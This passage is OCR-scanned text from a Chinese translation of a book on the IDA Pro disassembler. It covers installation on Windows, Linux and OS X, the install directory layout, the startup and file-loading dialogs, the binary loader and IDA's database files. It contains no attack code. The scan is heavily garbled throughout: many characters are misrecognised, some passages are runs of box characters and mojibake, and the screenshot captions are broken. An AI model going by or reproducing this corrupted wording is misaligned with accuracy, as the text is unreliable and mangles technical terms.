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在 后 面 几 草 中 讨论 )。 在 光盘 的 根 目录 下 ， 你 将 找到 一 个 安装 二 进 制 文件 。 对 于 Windows 用 户 ， 
这 个 二 进 制 文件 是 一 个 传统 的 Windows 安装 程 序 可 执行 文件 。 对 于 Linux fl OS X 用户 ,该 安装 
二 进 制 文件 是 一 个 由 gzip 压缩 的 .tar 文件 。 











3.4.1 Windows 安 装 


在 Windows 系统 上 安装 IDA 非常 简单 。IDA 的 Windows 安装 程序 需要 随 光 盘 提 供 的 密码 ， 
如 条 你 已 经 下 载 了 IDA， 那 么 密码 会 通过 电子 邮件 提供 。 局 动 IDA 的 Windows 安装 程 序 后 ， 你 
会 看 到 几 个 对 话 框 ， 其 中 只 有 一 个 对 话 框 需要 你 操作 。 如 图 3-1 所 示 ， 你 可 以 在 这 个 对 话 框 中 指 
^E IDA 的 安 痰 目录 ， 或 接受 安 效 程 序 默 认 的 安 冯 目 录 。 无 论 你 是 选择 默认 的 安 沪 目 录 ， 还 是 指 
定 其 他 安装 目录 ,在 本 书 的 剩余 部 分 ,我 们 将 以 <IDADIR> 作 为 安装 目录 。 在 IDA Bern, 你 将 
发 现 密 钥 文件 idakey 和 下 列 IDA 可 执行 文件 。 

O idag.exe: IDA 的 Windows GUI 版 本 。 从 6.2 版 开始 ，IDA 中 不 再 包含 该 文件 。 

O idaq.exe: IDA6.0 或 更 新 版 本 的 Windows QtGUI 版 本 。 

口 idaw.exe: IDA 的 Windows 文本 模式 版 本 。 

















i Setup - IDA Pro Advanced v6.1 


i =al xl 
Select Destination Location ; 
Where should IDA Pro Advanced v6. 1 be installed? 
t 





| Setup will install IDA Pro Advancec v6. 1 into the following folder. 


To continue, dick Next. If you would like to select a different folder, dick Browse. 


[c: Vrog'am FilesVda Brovise... | 


Atleast 190.6 MB of free disk space is requred. 


«mé [Ce] ce | 





图 3-1 选择 安装 目录 
随 着 IDA 6.0 开始 采用 Qt 跨 平台 GUI 库 ，IDA 的 原始 Windows 版 本 (idag.exe ) 已 被 废弃 ， 
将 从 版 本 6.2 开始 停止 随 IDA 向 用 户 提供 。 
3.4. OS X 和 Linux 安 装 


要 在 OS X 或 Linux 系统 上 安装 IDA， 首 先 必 须 用 gunzip 和 untar 程序 将 相应 的 压缩 文件 解 
压 到 你 所 选择 的 位 置 。 在 Linux 系统 中 ， 解压 命令 为 : 





# tar -xvzf idaeil.tgz 
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在 OSX 系 统 中 ， 解 压 命令 为 : 
# tar -xvzf ida61m. tgz 


无 论 是 哪 一 种 情况 ， 你 将 得 到 一 个 名 为 ida 的 顶层 目录 ， 其 中 包含 所 需 的 全 部 文件 。 

IDA 针对 OS X 和 Linux 系统 的 GUI 版 本 和 控制 台 版 本 的 名 称 分 别 为 idaq 和 idal。 上 述 控制 
台 版 本 的 外 观 与 IDA 的 Windows 控制 台 版 本 ( 如 图 3-2 所 示 ) 的 外 观 非常 相似 。Linux 用 户 可 能 
需要 验证 (使 用 1dd ) IDA 所 需 的 各 种 共享 库 能 否 在 他 们 的 系统 中 使 用 。 需 要 特别 指出 的 是 ,使 
用 插件 IDAPython 时 ,需要 安装 Python 2.6。 在 必要 时 ,你 可 能 需要 升级 Python 或 创建 符号 链接 
以 满足 IDA 的 要 求 。 


IDÀ - The Interactive Disassembler Pro 
Version 6.1 Win32 32-bit? 


Vi vk <c) 2011 Hex-Rays 
ttp://www.hex-rays.com 


License: 48-3419-7454-9D,. 1 user. adv 
Chris Eagle. IDÀ v6.1 beta 





图 3-2. IDA Pro 的 控制 台 版 本 


3.4.3 IDA5SELinux 


如 果 你 是 一 名 Linux 用 户 ， 并 且 已 启用 SELinux， 在 尝试 加 载 所 需 的 处 理 央 模块 时 ， 你 可 能 
会 发 现 IDA 显示 错误 消息 :“ 无 法 将 可 执行 栈 作 为 共享 对 象 店 用 。 使 用 execstack 命令 可 以 在 每 
个 模块 的 基础 上 解决 这 个 问题 ， 如 下 所 示 : 


execstack -c «IDADIR»/procs/pc.ilx 


3.4.4 32 位 IDA 与 64 位 IDA 


IDA 高 级 版 本 的 用 户 可 能 会 注意 到 ， 每 个 IDA 可 执行 文件 都 包括 两 个 版 本 ， 如 idag.exe 与 
idag64.exe， 或 者 idaq 与 idaq64。 这 两 个 版 本 之 间 的 区 别 在 于 : idax64 能 够 反 汇 编 64 位 代码 ， 而 
所 有 IDA 可 执行 文件 本 刁 为 32 位 代码 。 因 此 , 在 64 位 平台 上 运行 IDA 的 用 户 需要 确保 IDA. 所 
需 的 任何 文 持 软件 可 用 在 32 位 版 本 中 。 例 如 ， 如 采 64 位 Linux 用 户 希 望 使 用 IDAPython 以 提供 
脚本 文 持 ， 则 必须 安装 32 位 版 本 的 Python。 有 关 结 合 使 用 32 位 与 64 位 软件 的 详细 信息 ， 请 查 
阅 操作 系统 文档 。 
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3.4.5 ”1IDA 目 录 的 结构 


在 开始 使 用 IDA 之 前 ， 你 不 一 定 需要 熟悉 IDA 安装 目录 的 结构 。 但 是 ， 既 然 现 在 讨论 的 主 
题 是 安 闻 IDA， 还 是 初步 了 解 一 下 安 疙 目录 的 基本 结构 。 在 本 书 的 后 续 划 市， 我们 将 介绍 DA 
的 高 级 功能 ， 到 那 时 ， 了 解 IDA 安 污 目录 的 结构 将 变 得 更 加 重要 。 下 面 人 简要 介绍 IDA 安装 目录 
中 的 各 个 子 日 录 (对 于 Windows 和 Linux 用 户 ， 这 些 子 目录 位 于 <IDADIR> 下 ; 对 于 OSX 用户， 
这 些 子 日 录 可 能 位 于 <IDADTR>/idag.app/Contents/MacOS 下 ). 

O cfg. cfg 目录 包含 各 种 配置 文件 , 包括 基本 IDA 配置 文件 ida.cfg, GUI 配置 文件 idagui.cfg 

以 及 文本 模式 用 户 界 面 配 置 文件 idatui.cfg。 我 们 将 在 第 11 AIA IDA 的 一 些 更 加 重要 的 
配置 功能 。 

O ide. idc 目录 包含 IDA 的 内 置 脚本 语言 IDC 所 需 的 核心 文件 。 我 们 将 在 第 15 章 详 细 介绍 

如 何 使 用 IDC 编写 脚本 。 

O ids, ids 目录 中 包含 一 些 符 号 文件 (IDA 语法 中 的 IDS 文件 )， 这 些 文件 用 于 描述 可 被 加 
载 到 IDA 的 二 进 制 文件 引用 的 共 至 库 的 内 容 。 这 些 IDS 文件 包含 摘要 信息 ， 其 中 列 出 了 
由 某 一 个 指定 库 导 出 的 所 有 项 目 。 这 些 项 目 包 含 描述 某 个 函数 所 需 的 参数 类 型 和 数量 的 

言 息 、 子 数 的 返回 类 型 ( 如 果 有 ) 以 及 与 该 因数 的 调用 约定 有 关 的 信息 。 

O loaders. loaders 目录 包含 在 文件 加 载 过 程 中 用 于 识别 和 解析 PE 或 ELF 等 已 知 文件 格式 的 
IDA 扩展 。 我 们 将 在 第 18 章 详细 介绍 IDA WRA o 

O plugins. plugins 目录 包含 专门 为 IDA 提供 附加 功能 ( 多 数 情 况 下 由 用 户 定义 ) B3 IDA BS 
块 。 我 们 将 在 第 17 章 重点 讨论 IDA 插件 。 

口 procs。procs 目录 包含 已 安装 的 IDA. 版 本 所 文 持 的 处 理 硕 模块 。 处 理 送 模块 为 IDA 提供 
机 需 语 言 -汇编 语言 转换 功能 , 并 负责 生成 在 IDA 用 户 界面 中 显示 的 汇编 语言 。 我们 将 在 
第 19 章 详细 介绍 IDA 处 理 器 模块 。 

O sig. sig 目录 包含 IDA 在 各 种 模式 匹配 操作 中 利用 的 现 有 代码 的 签名 ,通过 模式 匹配 , IDA 
能 够 将 代码 序列 确定 为 已 知 的 库 代 码 ， 从 而 方 省 大 量 的 分 析 时 间 。 这 些 签名 由 DA 的 “ 快 
速 的 库 识别 和 鉴定 技术 ”( FLIRT ) 生成 ， 这 一 内 容 将 在 第 12 章 详细 介绍 。 

O til, til 目录 包含 一 些 类 型 库 信 息 , IDA 通过 这 些 信息 记录 特定 于 各 种 编译 带 库 的 数据 结构 
的 布局 。 我 们 将 在 第 13 章 详 细 介 绍 如 何 定 制 IDA 类 型 库 。 


35 IDA 用 户 界 面 


IDA 从 MS-DOS 继承 的 特性 至 今 仍 然 十 分 明显 。 无 论 使 用 哪 一 种 界面 ( 文本 界面 或 GUI), 
IDA 都 大 量 用 到 热 键 。 虽 然 这 并 非 坏 事 ， 但 是 ， 如 果 你 想当然 地 认为 目 己 正 使 用 文本 输入 模式 ， 
并 且 发 现 几 乎 每 一 次 击 键 部 会 叶 人 至 相当 意外 的 后 果 ， 那 就 说 明 IDA 执行 了 某 种 热 键 操作 。 例 如 ， 
在 使 用 GUI 时 ， 如 来 你 定位 光标 以 进行 修改 ， 并 且 硕 望 你 输入 的 内 容 全 部 出 现在 光标 位 置 ， 这 
时 就 可 能 会 出 现 令 人 意外 的 情况 〈IDA 可 不 像 字 处 理 程序 )。 










































































3.6 小结 3l 
从 数据 输入 的 角度 看 ，IDA 通过 对 话 框 接受 几乎 所 有 输入 。 因 此 ， 如 末 你 希望 在 IDA rp 
入 任何 数据 ， 则 必须 调 出 输入 数据 的 对 话 框 。IDA 的 十 六 进 制 编辑 功能 是 个 例外 ,该 功能 只 能 i 
过 Hex View 窗口 获得 。 
最 后 ， 需 要 记 住 的 是 : IDA 不 提供 撤销 功能 ! 因此 ， 如 果 不 小 心 按 下 一 个 键 , 局 动 了 一 项 热 
键 操作 ， 请 不 要 浪费 时 间 在 IDA 的 菜单 中 寻找 撤销 功能 ， 因 为 你 根本 找 不 到 。 同 样 ， 你 也 无 法 
找到 命令 历史 记录 列表 ， 以 查 明 你 刚刚 执行 的 操作 。 
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3.6 小结 

Y fi IDA 的 基本 信息 之 后 , 是 使 用 IDA 实现 某 种 有 用 的 目标 的 时 候 了 。 在 接 下 来 的 几 间 中 ， 
你 将 了 解 如 何 使 用 IDA 进行 基本 的 文件 分 析 ， 学 习 如 何 读 懂 DA 显示 的 数据 ， 以 及 如 何 通 过 这 
些 数据 深入 理解 程序 的 功能 。 
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T IDA 的 时 候 了 。 本 书 的 剩余 部 分 将 介绍 IDA 的 各 种 功能 , 以 及 如 何 利 
用 它们 来 满足 用 户 的 逆向 工程 需求 。 本 章 首 先 介 绍 启 动 IDA 后 会 看 到 的 各 种 选项 ， 其 
次 说 明 如 何 打开 二 进 制 文件 并 开始 分 析 过 程 。 最 后 简要 介绍 IDA 的 用 户 界 面 ， 为 学 习 后 面 的 几 
章 打 下 基础 。 

为 规范 统一 ， 本 和 草 及 本 书 其 他 部 分 的 示例 都 将 采用 Windows QtGUI 界面 ， 除 非 某 个 示例 需 
要 一 种 特殊 的 IDA 版 本 (如 Linux 调试 示例 )。 











4.1 RZ IDA 


只 要 启动 IDA， 你 都 会 看 到 一 个 初始 欢迎 界面 ， 上 面 显 示 你 的 许可 证 信息 摘要 。 初 始 屏 幕 消 
失 后 ，IDA 将 显示 另 一 个 对 话 框 ， 为 你 进入 桌面 环境 提供 3 种 选项 ， 如 图 4-1 所 示 。 


À IDA: Quick start 21 xl 








New Disassemble a new file 


LOTES Work on your own 





[v Display at startup 





图 4-1 JH 23] IDA 


如 果 不 和 希望 看 到 欢迎 信息 ， 可 以 取消 选中 该 对 话 框 底部 的 Display at startup (启动 时 显示 ) 复 
选 框 。 如 果 选 中 这 个 复 选 框 ， 将 来 启动 DART, DA 会 认为 你 已 经 单 击 了 Go 按钮， 因而 直接 进入 
一 个 空白 的 IDA 工作 区 。 如 采 在 某 个 时 候 ， 你 希望 再 次 使 用 欢迎 对 话 框 (毕竟, 它 可 以 方便 地 返 
回 最 近 使 用 过 的 文件 ), 你 可 以 编辑 IDA. 的 注册 表 项 , 将 DisplayWelcome 的 值 设 为 1 即 可 。 还 可 以 
选择 Windows > Reset hidden message， 这 将 显示 之 前 隐藏 的 所 有 信息 。 


41 Sa IDA 35 


说 明 O Windows 0 0 O IDA 0 O DA 00000 E] O HKEY CURRENT USER\Software\ 


Hex-RaysuD"ngnnug IPAOOOOOUOOOOOOOOOOOOOOOOO0OO0O 


UOUOOUOUUUUUUOOUOOUOOOODAOUOOUOOUOOUOOUOUUUUUUUUOUOUODG 
0 0 $SHOME/.idapro/ida.reg[] [] [] 





图 4-1 所 示 的 3 个 选项 进入 IDA dm Jr RA th. P EE faH, 

O New (新 建 )。 选 择 New 将 启动 一 个 标准 的 File Open 对 话 框 来 选择 将 要 分 析 的 文件 。 根 
据 选 择 的 文件 ，IDA 会 显示 另外 一 个 或 多 个 对 话 框 ， 你 可 以 选择 特定 的 文件 分 析 选 项 ， 
然后 再 加 载 、 分 析 和 显示 该 文件 。 

O Go (运行 )。Go 按钮 终止 加 载 过 程 ， 使 IDA 打开 一 个 空白 的 工作 区 。 这 时 ， 如 果 要 打开 
一 个 文件 ， 可 以 将 一 个 二 进 制 文件 直接 拖 放 到 IDA 工作 区 ， 或 者 使 用 File 菜单 中 的 某 个 
选项 打开 该 文件 。 前 面 介绍 过 ， 使 用 File » New 命令 可 启动 File Open 对 话 框 。 默 认 情 况 
F, IDA 会 利用 已 知 扩展 名 的 过 滤器 限制 File 对 话 框 的 显示 。 请 确保 修改 或 清除 该 过 滤器 
( 如 选择 AI Files ), 以 便 File 对 话 框 正确 显示 你 想 要 打开 的 文件 ”以 这 种 方式 打开 文件 时 ， 
IDA 会 尝试 目 动 识别 选 定 文件 的 类 型 。 但是， 要 特别 注意 Loading 对 话 框 ， 看 IDA 选择 了 
哪个 加 载 絮 来 处 理 这 个 文件 。 

口 Previous (上 一 个 )。 使 用 Previous 按钮 可 以 打开 其 下 “最 近 用 过 的 文件 ”列表 中 的 一 个 
文件 。“ 最 近 用 过 的 文件 ”列表 中 包含 IDA 的 Windows 注册 表 项 的 Hi story 子 项 中 的 值 。 
最 初 这 个 历史 记录 列表 的 最 大 长 度 设 为 10， 但 你 可 以 编辑 idagui.cfg 或 idatui.cfg 文件 中 
的 相应 项 目 ,， 将 这 一 限制 升 高 到 100 (参见 第 11 草 )。 要 想 重 新 处 理 最 近 用 过 的 数据 库 文 
件 ， 使 用 这 个 历史 记录 列表 是 最 方便 的 选择 。 
































4.1.1 1IDA 文 件 加 载 


使 用 File » Open 命令 打开 一 个 新 文件 时 , 会 看 到 如 图 4-2 所 示 的 加 载 对 话 框 。IDA 会 生成 一 
个 可 能 的 文件 类 型 列表 , 并 在 对 话 框 项 部 显示 这 个 列表 。 这 个 列表 中 将 显示 最 适合 处 理 选 定 文件 
HJ IDA 加载 器 。IDA 通过 执行 loaders 目录 中 的 每 一 个 文件 加 载 器 ”, 来 确定 能 够 识别 新 文件 的 加 
载 器 ， 从 而 建立 了 这 个 列表 。 注 意 ,在 图 4-2 中 ，Windows PE 加 载 器 (pe.ldw ) 和 MS-DOS EXE 
加 载 器 ( dos.ldw ) 均 声称 它们 能 够 识别 选 定 的 文件 。 对 此 ,熟悉 PE 文件 格式 的 读者 并 不 会 感到 
惊奇 ， 因 为 PE 文件 格式 是 MS-DOS EXE 文件 格式 的 扩展 形式 。Binary File (二 进 制 文件 ) 是 这 
个 列表 中 的 最 后 一 个 选项 ， 它 会 一 直 显 示 ， 因 为 它 是 DA 加 载 无 法 识别 的 文件 的 默认 选项 ， 它 
提供 了 最 低级 的 文件 加 载 方 法 。 如 果 IDA 提供 几 个 加 载 占 ， 这 时 选择 默认 选项 倒是 一 个 不 错 的 
策略 ， 除 非 你 拥有 推翻 IDA 决定 的 信息 。 











CD 较 低 版 本 的 IDA 使 用 HKEY CURRENT. USER\Software\Datarescue\IDA。 
(2) 在 非 Windows 系统 中 ， 可 执行 文件 没有 扩展 名 的 情况 并 不 少见 。 
(3) 我 们 将 在 第 18 章 详细 介绍 IDA 加 载 器 。 
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ì Load a new file kd 区 | 


Load file C: miami mnie exe as 


:Portable executable for 80386 (PE) [pe.ld 
MS-DOS eeng E [dos. v 
file 


Binary 























Processor type 


[Inte 80x86 processors: metapc E | 


Loading segment [oxo0000000 
[v Enabled 
Loading offset [oxoooo0000 [v Indicator enabled 


Options 





[V Create segments | Kemdooonsi | options 1 


[ Loadresources 
[v Rename DLL entries 


l Mai Kernel options 2 | 


Jv. Fil segment gaps 


[v Make imports segment m | 


[ Create FLAT group 


System DLL directory | C:\Windows 
| | om | 


图 4-2 IDA 的 Load a new file 对 话 框 


有 时 候 ，Binary File 是 出 现在 加 载 希 列表 中 的 唯一 选项 。 这 表示 没有 加 载 融 能 够 识别 选 定 的 
文件 。 这 时 ， 如 采 你 和 希望 继续 完成 加 载 过 程 ， 请 确保 根据 目 己 对 文件 内 容 的 理解 ,选择 合 适 的 处 
Hi zent. 

在 Processor Type ( 处 理 器 类 型 ) 下 拉 沫 单 中 可 以 指定 在 反 汇 编 过 程 中 使 用 的 处 理 需 模块 ` 
IDA 的 procs 目录 中 )。 多 数 情况 下 ,IDA 将 根据 它 从 可 执行 文件 的 头 中 该 取 到 的 信息 ,选择 合 
的 处 理 硕 。 如 条 IDA 无 法 正确 确定 与 所 打开 的 文件 关联 的 处 理 硕 类 型 fEHEA dcinde er. Hij , 
你 必须 手动 选择 一 种 处 理 融 类 型 。 

如 果 你 同时 选择 了 二 进 制 文件 输入 格式 和 一 种 x86 RYA, Loading Segment ( 加 载 段 ) 和 
Loading Offset ( 加 载 偏 移 量 ) 字 段 将 处 于 活动 状态 。 由 于 二 进 制 加 载 融 无 法 提取 任何 内 存 布 局 信息 ， 
在 这 里 输入 的 段 和 仿 移 量 值 将 共同 构成 所 加 载 文 件 内 容 的 基 址 。 在 最 初 的 加 载 过 程 中 , Jm Oe 
定 基 址 ， 可 以 在 任何 时 候 使 用 Edit > Segments 》 Rebase Program 命令 来 修改 IDA 镜像 的 基 址 。 

Kernel Options ( 核心 选项 ) 按钮 用 于 配置 特定 的 反 汇 编 分 析 选 项 ,IDA 可 利用 这 些 选 项 改进 
递归 下 降 过 程 。 绝 大 多 数 情 况 下 ， 默认 选项 提供 的 都 是 最 佳 的 反 汇 编选 项 。 男 外 ，IDA 帮助 文件 
提供 了 其 他 与 可 用 核心 选项 有 关 的 信息 。 

Processor Options ( 处 理 融 选项 ) 按钮 用 来 选择 适用 于 选中 的 处 理 带 模块 的 配置 选项 ， 但 它 
不 一 定 对 每 个 处 理 天 模块 有 效 。 它 只 能 为 反 汇 编 过 程 提 供 有 限 的 帮助 , 因为 这 些 选 项 非常 依赖 于 
用 户 选 定 的 处 理 需 模块 ， 以 及 模块 创建 者 的 编程 能 力 。 

其 他 选项 复 选 框 可 帮助 用 户 更 好 地 控制 文件 加 载 过 程 。IDA 的 帮助 文件 详细 介绍 了 这 里 的 
一 个 选项 。 这 些 选项 并 不 适用 于 所 有 输入 文件 类 型 ， 多 数 情 况 下 ， 用 户 可 以 使 用 IDA 的 默认 设 
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置 。 我 们 将 在 第 21 章 介 绍 需要 修改 这 些 选项 的 特殊 情况 。 


4.1.2. 使 用 二 进 制 文件 加 载 器 


如 采 选 择 使 用 二 进 制 加 载 锅 ,需要 比 平 稼 做 更 多 的 工作 。 由 于 没有 文件 头 信息 引导 分 析 过 程 ， 
你 必须 手动 执行 通 浓 由 更 加 强大 的 加 载 需 自动 完成 的 任务 。 需 要 使 用 二 进 制 加 载 需 的 情形 包括 : 
分 析 从 网 络 数据 包 或 日 志文 件 中 提取 出 来 的 ROM 镜像 和 破解 程序 负载 。 

如 果 同 时 选择 x86 处 理 带 模块 和 二 进 制 加 载 右 ， 将 会 显示 如 图 4-3 所 示 的 对 话 框 。 由 于 IDA 
无 法 获得 可 用 的 文件 头 信 息 , 用 户 需 要 指定 是 将 代码 作为 16 位 模式 代码 ,还 是 作为 32 位 模式 代 
码 处 理 。IDA 还 能 够 为 ARM 和 MIPS 等 处 理 器 区 分 16 位 与 32 位 模式 。 


The loaded binary file can be disassembled in 2 modes: 
1. 16-bit mode 

2. 32-bit mode 

Do you want to disassemble it as 32-bit code? 














E] e | 





图 4-3 x86 模式 选择 
二 进 制 文件 并 不 包含 有 关内 存 布局 的 信息 (也 就 是 说 ， 至 少 不 提 供 IDA 能够 识别 的 信息 )。 
剖面 介 绍 过 ， 如 采 选 择 一 个 x86 类 型 的 处 理 带 ， 则 必须 在 加 载 带 对 话 框 的 Loading Segment 和 
Loading Offset 罕 段 中 指定 基 址 信息 。 对 于 所 有 其 他 类 型 的 处 理 器 , IDA 会 显示 如 图 4-4 所 示 的 内 
存 布局 对 话 框 。 为 了 方便 ， 可 以 创建 一 个 RAM 块 或 一 个 ROM 块 ， 或 者 同时 创建 这 两 个 块 ， 并 
指定 每 个 块 的 地 址 范围 。Input File 选项 用 来 指定 应 加 载 输入 文件 的 哪 一 个 部 分 ( 默认 为 整个 文 
件 )， 以 及 文件 内 容 所 对 应 的 地 址 。 
2| xi 


RAM 






















[ Create RAM section 


RAM start address [oxoo000000 
RAM size | 0x00000000 


ROM 
[ Create ROM section 

ROM start address [oxoo000000 

ROM size | 0x000000A9 

Input file 
Loading address [oxo0000000 — ` 
File offset [oxoo000000 . 
EE» àààà 


Additional binary files can be loaded into the database 
using the "File, Load file, Addtional binary file" command. 


Lo f cm | 


图 4-4 内存 组 织 对 话 杠 
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图 4-5 显示 的 是 加 载 二 进 制 文件 的 最 后 一 个 步 又 : 一 个 友善 的 提醒 一 一 你 需要 做 一 些 工 作 。 
图 中 的 消息 表明 一 个 事实 : IDA 没有 可 用 的 文件 头 信息 带 助 它 区 分 二 进 制 文件 中 的 代码 季节 和 数 
ja WB. XHHT, IDA 会 提醒 用 户 指定 文件 中 的 一 个 地 址 作为 入口 点 ， 告 诉 IDA 将 这 个 地 址 的 字 
"PM CC 是 用 于 强制 IDA 将 字 市 作为 代码 处 理 的 热 键 ) 对 于 二 进 制 文件 ，IDA 不 会 进 
行 任何 初始 反 汇 编 ， 除 非 你 至 少 确定 了 一 个 代码 字 节 。 


3 Information I | xl 


SX  Youhave just loaded a binary file. 




















IDA Pro can't identify the entry point automatically as 
there is na standard of binaries. 


Please mave to what you think is an entry point 
and press 'C to start the autoanalysis. 


[ Don't display this message again 





图 4-5 二进制 文件 加 载 


4.2 IDA 数据 库 文件 


选择 加 载 选 项 ， 单 击 OK 按钮 关闭 对 话 杠 后， 加 载 文件 的 工作 才 真 正 开 始 。 这 时 ，IDA 的 任 
务 是 将 选 定 的 可 执行 文件 加 载 到 内 存 中 , 并 对 相关 部 分 进行 分 析 。 随后 , IDA 会 创建 一 个 数据 库 ， 
其 组 件 分 别 保存 在 4 个 文件 中 ， 这 些 文件 的 名 称 与 选 定 的 可 执行 文件 的 名 称 相同 ， 扩 展 名 分 别 
Xido, idl, .nam 和 .tl。.id0 文件 是 一 个 二 又 树 形式 的 数据 库 ，.id1 文件 包含 描述 每 个 程序 学 市 
的 标记 。.nam 文件 包含 与 IDA 的 Names 窗口 (将 在 第 5 草 详 细 介 绍 ) 中 显示 的 给 定 程 序 位 置 有 
关 的 索引 信息 。 最 后 ，. 世 文件 用 于 存储 与 一 个 给 定数 据 库 的 本 地 类 型 定义 有 关 的 信息 。 这 些 文件 
的 格式 为 IDA 专 用 , 在 IDA 环境 以 外 很 难 对 它们 编辑 。 

为 了 方便 ,在 你 关闭 当前 项 目 时 , 这 4 个 文件 将 被 存档 , 你 还 可 以 选择 将 它们 压缩 成 一 个 IDB 
文件 。 通 常 ， 人 们 说 到 IDA 数据 库 时 实际 上 指 的 是 IDB 文件 。 一 个 未 压缩 的 数据 库 文 件 的 大 小 

- 般 是 最 初 输入 的 二 进 制 文件 的 10 倍 。 如 果 数 据 库 正常 关闭 ， 你 绝 不 会 在 工作 目录 中 看 到 扩展 
名 为 .id0、.idl nam 或 .ti 的 文件 。 如 果 工 作 目 录 中 存在 这 些 文件 ， 则 往往 表示 数据 库 被 意外 关 
HI (例如 ，IDA bü )， 这 时 数据 库 可 能 被 损坏 。 





























加 载 器 警告 
YE [EE B BE E 
PDBUODOOOODOOO PED ü 000 IDATI EI EI C] E] D] C] D] UU Program Database, PDB[1E O O 
uUguugugdtgtgtatgtatttattttttattttt PDbB[I [LU 
" IDAPro[] [] i ü B B a dgadtdttatateatataettatttttttt Microsoft Symbol 
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Server UDUUUU PPBUUDOOUD 

ELLE TEL ES IER ET LE ER IE DT ET LI UE EI HEUTE BB. DILE BE BE BS IB B BEL BS BEI ET EL HI 
EL BEBE BEBE TELE BI EE BE E BIET BT ELTE DEBE OE a HB RELIÉ OE E TECH IBI DE Ul B ET I 
E E EE OD'D OO OCT HK DI BILE TB E e IE DIE: OMC ETUR BL BIO OI HI 
LU DU LEE UI 

CODE COD O UL IBI I UI EI D EE a e o E o a a DOE DD ED DOE Eu 
(DOUUDDDUDDUUDDUUUDU E D makeimportsecaon [] L D D EO D D HE B] D] 
UU DDguuut 

COD: SLP BRE BIET B JE TTE ELLE BI EO LEID 


值得 注意 的 是 , 一 旦 IDA 为 某 个 可 执行 文件 创建 数据 库 ， 它 就 不 再 需要 访问 这 个 可 执行 
文件 ， 除 非 你 布 望 使 用 IDA 的 集成 调试 船 调试 这 个 可 执行 文件 本 身 。 从 安全 角度 看 ， 这 和 是 一 
项 有 用 的 功能 。 例 如 ， 在 分 析 一 个 恶意 软件 样本 时 ， 只 需 在 分 析 人 员 之 间 传 递 相关 数据 库 ， 
而 不 必 传 递 可 执行 的 恶意 文件 本 映 。 使 用 IDA 数据 库 作 为 亚 意 软件 的 攻击 向 量 ， 这 样 的 案例 
尚未 出 现 。 

就 本 质 而 言 ，IDA 不 过 是 一 个 数据 库 应 用 程序 。 分 析 可 执行 文件 时 ，IDA 会 日 动 创建 和 填充 
新 的 数据 库 。IDA 提供 的 各 种 显示 不 过 是 各 种 数据 库 视 图 , 以 一 种 有 利于 软件 逆 回 工程 的 格式 发 
布 相关 信息 。 用 户 对 数据 库 所 做 的 任何 修改 都 会 在 这 些 视图 中 反映 出 来 ， 并 随 数 据 库 一 起 保存 ， 
但 这 些 更 改 并 不 会 影响 原始 的 可 执行 文件 。 IDA 的 强大 之 处 在 于 , 它 包含 各 种 可 用 于 分 析 和 操作 
数据 库 数 据 的 工具 。 


4.2.1 创建 IDA 效 据 库 


在 你 选择 一 个 准备 分 析 的 文件 并 指定 选项 之 后 ，IDA 将 开始 创建 数据 库 。 在 这 个 过 程 中 ， 
IDA 会 将 控制 权 转 交 给 你 选 定 的 加 载 带 模块 ， 该 模块 的 工作 包括 : 从 磁盘 加 载 文件 ， 解 析 它 能 
够 识别 的 任何 文件 头 信 息 ， 创 建 各 种 包含 代码 或 数据 ( 在 文件 关中 指定 ) 的 程序 块 ， 最 后 在 将 
控制 权 返 还 IDA 之 前 确定 特定 的 代码 入 口 点 。 在 这 方面 ，IDA 加 载 此 村 块 的 行为 类 似 于 操作 系 
EIRA IDA 加 载 带 将 根据 程序 文件 头 包 含 的 信息 ， 确 定 一 个 虚拟 内 存 布局 ， 并 对 数据 库 进 
行 相应 的 配置 。 

加 载 带 完 成 工作 后 ，IDA 内 的 反 汇 编 引 擎 将 接管 控制 权 ， 一 次 传 一 个 地 址 给 选 定 的 处 理 带 
模块 。 处 理 器 模块 的 工作 包括 : 确定 位 于 该 地 址 的 指令 的 类 型 、 长 度 ， 以 及 从 这 个 地 址 继续 执 
行 指令 的 位 置 (例如 , 是 当前 的 指令 序列 还 是 分 文 )。 WR IDA 认为 它 已 经 找到 了 文件 中 的 所 有 
指令 ， 它 会 第 二 次 换 历 指令 地 址 列表 ， 并 请 处 理 需 模块 将 每 个 指令 转换 成 汇编 语言 ， 然 后 将 它 
们 显示 出 来 。 

在 这 个 反 汇 编 完成 之 后 ，IDA 将 目 动 对 二 进 制 文件 进行 额外 的 分 析 ， 以 提取 出 其 他 可 能 
对 分 析 人 员 有 用 的 信息 。 在 IDA 完成 初始 分 析 后 , 用户 可 能 会 在 数据 库 中 发 现 以 下 一 些 或 全 


部 信息 。 
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Q 编译 器 识别 。 通 常 ， 了 解构 建 软 件 所 使 用 的 编译 融会 对 我 们 有 所 大助。 识别 所 使 用 的 编 
详 肖 可 帮助 我 们 了 解 二 进 制 文件 使 用 的 函数 调用 约定 ， 并 确定 该 二 进 制 文件 链接 到 哪些 
库 。 在 加 载 文件 时 ，IDA 会 答 试 确定 用 于 创建 输入 文件 的 编译 需 。 如 果 能 够 确定 编译 角 ， 
束 可 以 在 输入 文件 中 扫描 该 编译 此 使 用 的 样板 代码 序列 ， 然 后 ， 将 这 些 代 码 以 彩色 显示 ， 
以 减少 需要 分 析 的 代码 的 数量 。 

Q 函数 参数 和 局 部 变量 识别 。 对 于 每 一 个 已 识别 的 函数 ( 其 地 址 是 调用 指令 的 日 标 )，IDA 
会 详细 分 析 栈 指针 寄存 带 的 行为 ， 以 确定 栈 内 的 变量 ， 并 了 解 函数 栈 帧 * 的 布局 。 然 后 ， 
IDA 会 根据 这 些 变量 的 用 途 ( 作为 函数 中 的 局 部 变量 ,或 者 在 函数 调用 过 程 中 作为 传递 
给 函数 的 参数 )， 日 动 为 它们 生成 名 称 。 

口 数据 类 型 信息 。 利 用 对 公共 库 函 数 及 其 所 需 参 数 的 了 解 ，IDA 会 在 数据 库 中 添加 注释 ， 
以 指明 癌 这 些 函 数 提交 参数 的 位 置 。 由 于 这 些 注释 提供 了 需要 检索 各 种 API 参考 资料 才 
能 获得 的 信息 ， 因 此 ， 它 们 可 为 分 析 人 员 方 省 大 量 时 间 。 























4.2.2 ”关闭 IDA 数 据 库 
任何 时 候 你 关闭 一 个 数据 库 , 无 论 你 是 完全 关闭 IDA， 还 是 切换 到 另 一 个 数据 库 ，IDA 都 将 
显示 一 个 Save database (保存 数据 库 ) 对 话 框 ， 如 图 4-6 所 示 。 


IDA will save all changes to the disk. 





(^ Don't pack database 
(* Pack database (Store) 
(C Pack database (Deflate) 


[ Collect garbage 
[ DONT SAVE the database 














De E D 





图 4-6 Save database 对 话 框 


